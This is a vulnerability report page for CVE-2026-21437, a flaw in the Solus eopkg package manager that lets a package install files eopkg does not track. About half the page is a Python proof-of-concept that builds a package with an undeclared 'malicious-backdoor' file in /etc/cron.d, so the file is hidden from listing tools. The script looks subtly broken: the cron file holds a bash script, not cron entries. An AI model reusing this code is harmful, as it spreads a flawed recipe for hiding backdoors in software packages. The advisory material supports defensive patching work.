Security Vulnerability Report
CVE-2026-21437 CVSS 5.5 MEDIUM

CVE-2026-21437

Published: 2026-01-01 18:15:41
Last Modified: 2026-03-04 21:31:50

Description

eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could include files that are not tracked by `eopkg`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be shown by `lseopkg` and related tools. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:* - VULNERABLE
Solus eopkg < 4.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-21437 PoC - Malicious eopkg package with untracked files
# This PoC demonstrates how a malicious package can include files not tracked by eopkg
# Reference: https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d
import tarfile
from io import BytesIO  # required by tar.addfile(); missing from the original listing


def create_malicious_package():
    """
    Create a malicious eopkg with untracked files.

    The package.xml only declares some files, but the actual archive
    contains additional hidden files.
    """
    # Package metadata - only declares legitimate files
    package_xml = '''<?xml version="1.0" encoding="utf-8"?>
<Package name="fake-package" version="1.0.0" release="1">
    <Summary>Legitimate package description</Summary>
    <Description>A seemingly harmless package</Description>
    <Maintainer>Attacker &lt;[email protected]&gt;</Maintainer>
    <License>GPL-3.0</License>
    <IsA>package</IsA>
    <PartOf>system.base</PartOf>
    <RuntimeDependencies/>
    <Files>
        <File path="/usr/bin/legitimate-binary">
            <Type>executable</Type>
        </File>
    </Files>
</Package>'''

    # Create package archive with additional untracked files
    with tarfile.open('malicious.eopkg', 'w') as tar:
        # Add package metadata
        info = tarfile.TarInfo(name='install/package.xml')
        info.size = len(package_xml.encode())
        tar.addfile(info, fileobj=BytesIO(package_xml.encode()))

        # Add legitimate file (tracked)
        legitimate_file = b'#!/bin/bash\necho "Legitimate tool"'
        info = tarfile.TarInfo(name='install/usr/bin/legitimate-binary')
        info.size = len(legitimate_file)
        tar.addfile(info, fileobj=BytesIO(legitimate_file))

        # Add untracked malicious file (NOT declared in package.xml)
        # This file will be installed but not tracked by eopkg
        malicious_file = (b'#!/bin/bash\n'
                          b'# Hidden backdoor - not tracked by lseopkg\n'
                          b'rm -f /tmp/.hidden_payload && /bin/bash')
        info = tarfile.TarInfo(name='install/etc/cron.d/malicious-backdoor')
        info.size = len(malicious_file)
        tar.addfile(info, fileobj=BytesIO(malicious_file))

    print('[+] Malicious package created: malicious.eopkg')
    print('[+] The backdoor file will not appear in lseopkg listings')


if __name__ == '__main__':
    create_malicious_package()

# Vulnerable eopkg versions: < 4.4.0
# Fixed version: 4.4.0+
# Reference: https://github.com/getsolus/eopkg/releases/tag/v4.4.0
```

References

https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d (Patch)
https://github.com/getsolus/eopkg/pull/201 (Issue Tracking, Patch)
https://github.com/getsolus/eopkg/releases/tag/v4.4.0 (Product, Release Notes)
https://github.com/getsolus/eopkg/security/advisories/GHSA-hjp7-qwrj-6cc6 (Patch, Vendor Advisory)

Weakness
CWE-353

Secondary CVSS 4.0 Vector
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:H
Base Score 2.0 (LOW)